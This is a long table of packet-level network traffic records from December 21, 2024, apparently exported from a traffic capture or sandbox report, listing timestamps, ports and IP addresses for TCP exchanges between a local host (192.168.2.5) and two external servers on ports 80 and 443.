                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.777379990 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.777388096 CET49917443192.168.2.5104.21.23.76
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.777398109 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.777475119 CET49917443192.168.2.5104.21.23.76
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.777482986 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.778402090 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.778453112 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.778513908 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.778758049 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.778790951 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.778803110 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.778835058 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.779946089 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.779998064 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.780076981 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.780117989 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.781117916 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.781451941 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.781497955 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.782269955 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.782385111 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.782577038 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.782619953 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.783452034 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.783497095 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.783729076 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.783771038 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.784629107 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.784676075 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.784749031 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.784796000 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.785433054 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.785471916 CET49917443192.168.2.5104.21.23.76
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.785480022 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.785768986 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.785810947 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.786133051 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.786655903 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.787034988 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.787045956 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.787080050 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.788158894 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.788207054 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.788343906 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.788389921 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.789334059 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.789408922 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.790090084 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.790138960 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.790527105 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.790538073 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.790575981 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.791726112 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.791738987 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.791909933 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.792846918 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.792992115 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.793056011 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.793103933 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.793998003 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.794073105 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.794099092 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.794114113 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.795217991 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.795258999 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.795711040 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.795929909 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.796355963 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.796375990 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.796403885 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.796423912 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.797544956 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.797589064 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.797753096 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.797844887 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.798728943 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.798779011 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.799468040 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.799511909 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.799730062 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.799952984 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.799997091 CET49917443192.168.2.5104.21.23.76
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.800007105 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.800033092 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.800267935 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.800318956 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.801110029 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.801336050 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.801398993 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.801439047 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.802261114 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.802311897 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.802550077 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.802592039 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.803425074 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.803466082 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.803639889 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.803682089 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.804601908 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.804652929 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.804846048 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.804887056 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.805780888 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.805820942 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.806512117 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.806560993 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.807035923 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.807049036 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.807080030 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.808146000 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.808202028 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.808273077 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.808346987 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.809317112 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.809366941 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.809591055 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.809629917 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.810518026 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.810569048 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.810821056 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.810861111 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.811876059 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.811887026 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.811923027 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.812845945 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.812896013 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.813512087 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.813558102 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.814004898 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.814044952 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.814544916 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.814888000 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.815206051 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.815217972 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.815244913 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.815263987 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.816435099 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.816492081 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.816734076 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.816785097 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.817554951 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.817567110 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.817605019 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.818706989 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.818770885 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.819396973 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.819438934 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.819894075 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.819941044 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.820111990 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.820152044 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.821062088 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.821114063 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.821177006 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.821218014 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.822283030 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.822293997 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.822333097 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.823415041 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.823467016 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.823707104 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.823746920 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.824606895 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.824646950 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.824877977 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.824918032 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.825766087 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.825818062 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.826630116 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.826683998 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.826988935 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.827001095 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.827035904 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.828119040 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.828170061 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.828803062 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.829026937 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.829289913 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.829394102 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.830507994 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.830518961 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.830555916 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.830578089 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.830617905 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.831655979 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.831726074 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.831758976 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.831931114 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.832839966 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.832881927 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.833504915 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.833547115 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.834048986 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.834059954 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.834101915 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.835150957 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.835194111 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.836369991 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.836380959 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.836421013 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.836500883 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.836540937 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.837515116 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.837579012 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.838516951 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.838710070 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.838757038 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.839884043 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.839905024 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.839936018 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.839957952 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.896634102 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.896682978 CET49917443192.168.2.5104.21.23.76
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.896692991 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.968964100 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.969168901 CET49917443192.168.2.5104.21.23.76
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.969191074 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.970448971 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.970516920 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.970551968 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.970614910 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.971059084 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.971144915 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.971205950 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.971991062 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.972043037 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.972119093 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.972246885 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.972980976 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.973082066 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.973109961 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.973155975 CET49917443192.168.2.5104.21.23.76
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.973200083 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.973262072 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.973310947 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.973331928 CET49917443192.168.2.5104.21.23.76
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.973366976 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.973392963 CET49917443192.168.2.5104.21.23.76
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.973411083 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.974323988 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.974379063 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.974637985 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.974689960 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.975480080 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.975548029 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.975588083 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.975630999 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.976721048 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.976784945 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.976792097 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.976843119 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.977848053 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.977897882 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.978368998 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.978425026 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.979039907 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.979093075 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.979159117 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.980174065 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.980283976 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.981381893 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.981399059 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.981417894 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.981457949 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.981506109 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.982557058 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.982606888 CET4991080192.168.2.531.41.244.11
